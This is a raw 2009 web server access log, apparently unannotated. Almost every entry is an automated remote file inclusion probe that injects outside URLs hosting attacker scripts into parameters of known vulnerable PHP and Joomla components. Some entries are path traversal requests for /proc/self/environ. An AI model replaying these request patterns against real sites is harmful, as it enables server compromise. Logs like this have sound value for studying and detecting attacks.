195.225.168.186 - - [16/Aug/2009:06:18:36 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:19:04 -0500] "GET /logs/access_log.1234396800/errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:19:28 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:19:28 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:19:28 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:19:35 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:06:20:52 -0500] "GET /logs/access_log.1247788800////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:06:20:52 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:06:20:55 -0500] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:06:21:02 -0500] "GET /logs/access_log.1247875200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:22:31 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:22:38 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:22:38 -0500] "GET /logs/access_log.1236038400//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:22:38 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:06:22:55 -0500] "GET /logs/index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.829"
94.23.3.20 - - [16/Aug/2009:06:22:55 -0500] "GET /index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.829"
66.246.252.166 - - [16/Aug/2009:06:23:04 -0500] "GET /logs/access_log.1247616000//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:23:04 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:06:24:11 -0500] "GET /logs/index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:06:24:11 -0500] "GET /index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
78.90.113.17 - - [16/Aug/2009:06:24:39 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
78.90.113.17 - - [16/Aug/2009:06:24:39 -0500] "GET //include/mail.inc.php?skin_board_path=http://e-curriculae.com/solucionuno/informes_gral/Images/caratula/id? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
209.172.33.230 - - [16/Aug/2009:06:24:51 -0500] "GET /logs/access_log.1242259200//includes/login.php?_SESSION[docroot_path]=http://www.sexywomenalways.com/sexynews/data/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:25:23 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:25:24 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:25:24 -0500] "GET /logs/access_log.1236038400//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:25:47 -0500] "GET /logs/access_log.1247616000//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:25:47 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.98.115.58 - - [16/Aug/2009:06:25:57 -0500] "GET //includes/login.php?_SESSION[docroot_path]=http://jenniferlthomas.com/jalp/baner.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
65.98.115.58 - - [16/Aug/2009:06:25:57 -0500] "GET /logs//includes/login.php?_SESSION[docroot_path]=http://jenniferlthomas.com/jalp/baner.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
65.98.115.58 - - [16/Aug/2009:06:25:57 -0500] "GET /logs/access_log.1236038400//includes/login.php?_SESSION[docroot_path]=http://jenniferlthomas.com/jalp/baner.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:27:03 -0500] "GET /?DOCUMENT_ROOT=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:06:27:03 -0500] "GET /?DOCUMENT_ROOT=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:06:27:06 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 200 201276 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:06:27:07 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 200 201276 "-""libwww-perl/5.79"
65.55.106.112 - - [16/Aug/2009:06:28:16 -0500] "GET /logs/access_log.1186617600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.33.18.66 - - [16/Aug/2009:06:29:13 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
201.33.18.66 - - [16/Aug/2009:06:29:13 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
201.33.18.66 - - [16/Aug/2009:06:29:13 -0500] "GET /logs/access_log.1236211200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
201.33.18.66 - - [16/Aug/2009:06:29:13 -0500] "GET /logs/access_log.1237075200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
65.55.106.163 - - [16/Aug/2009:06:29:17 -0500] "GET /logs/access_log.1146614400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.246.252.166 - - [16/Aug/2009:06:29:47 -0500] "GET /logs/access_log.1238284800//modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:29:47 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:29:47 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:06:30:00 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:06:30:00 -0500] "GET /logs/access_log.1247788800////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:06:30:00 -0500] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 201283 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:06:30:04 -0500] "GET /logs/access_log.1247875200////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:06:30:54 -0500] "GET /home.php?index=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:06:30:54 -0500] "GET /logs/home.php?index=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:06:30:54 -0500] "GET /logs/access_log.1241049600%20%20/home.php?index=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:30:59 -0500] "GET /logs/access_log.1240272000//modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
110.45.145.66 - - [16/Aug/2009:06:31:20 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
110.45.145.66 - - [16/Aug/2009:06:31:20 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
110.45.145.66 - - [16/Aug/2009:06:31:20 -0500] "GET /logs/access_log.1236211200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
110.45.145.66 - - [16/Aug/2009:06:31:20 -0500] "GET /logs/access_log.1237075200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://72.29.83.201/~cpdemoc/images/Mil0_images/visa1.gif?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:32:39 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:32:39 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:32:39 -0500] "GET /logs/access_log.1238284800//modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.97.43.58 - - [16/Aug/2009:06:32:42 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.homesteadnazarene.org/id.gif? HTTP/1.0" 404 282 "-""Mozilla/5.0"
216.97.43.58 - - [16/Aug/2009:06:32:42 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.homesteadnazarene.org/id.gif? HTTP/1.0" 404 287 "-""Mozilla/5.0"
216.97.43.58 - - [16/Aug/2009:06:32:42 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.homesteadnazarene.org/id.gif? HTTP/1.0" 404 309 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:06:34:11 -0500] "GET /logs/access_log.1240272000//modules/Neos_Chronos/header.php?base_folder=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
202.170.119.1 - - [16/Aug/2009:06:34:27 -0500] "GET /SSI.php?sourcedir=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 290 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.170.119.1 - - [16/Aug/2009:06:34:27 -0500] "GET /logs/SSI.php?sourcedir=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.170.119.1 - - [16/Aug/2009:06:34:27 -0500] "GET /logs/access_log.1242864000/SSI.php?sourcedir=http://dvdsetsale.com/js/idfeelcomz.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.97.43.58 - - [16/Aug/2009:06:35:15 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.homesteadnazarene.org/id.gif? HTTP/1.0" 404 311 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:30 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:30 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:30 -0500] "GET /logs/access_log.1241222400//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:33 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:33 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:33 -0500] "GET /logs/access_log.1241222400//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:33 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:33 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:39:33 -0500] "GET /logs/access_log.1241222400//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:06:39:43 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:06:39:43 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:06:39:43 -0500] "GET /logs/access_log.1243728000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:06:40:39 -0500] "GET /logs/access_log.1243641600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
65.98.115.58 - - [16/Aug/2009:06:41:08 -0500] "GET /logs/access_log.1242259200//includes/login.php?_SESSION[docroot_path]=http://jenniferlthomas.com/jalp/baner.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:41:24 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:41:24 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:41:24 -0500] "GET /logs/access_log.1241222400//skins/advanced/advanced1.php?pluginpath[0]=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.119.218.115 - - [16/Aug/2009:06:43:05 -0500] "GET /logs//index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.119.218.115 - - [16/Aug/2009:06:43:05 -0500] "GET //index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
75.119.218.115 - - [16/Aug/2009:06:43:17 -0500] "GET /logs//index.php?conteudo=http://www.autoremap.com//id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
75.119.218.115 - - [16/Aug/2009:06:43:17 -0500] "GET //index.php?conteudo=http://www.autoremap.com//id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
206.225.16.63 - - [16/Aug/2009:06:44:33 -0500] "GET /logs/access_log.1242259200//includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
75.119.218.115 - - [16/Aug/2009:06:45:05 -0500] "GET /logs//index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.119.218.115 - - [16/Aug/2009:06:45:05 -0500] "GET //index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.207.93 - - [16/Aug/2009:06:45:16 -0500] "GET /logs/access_log.1176595200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:22 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs/access_log.1244851200//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:23 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:57 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:58 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:58 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:45:58 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:46:05 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:46:05 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:46:05 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:06:46:05 -0500] "GET /logs/access_log.1243468800//modules/agendax/addevent.inc.php?agendax_path=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:47:57 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:47:57 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
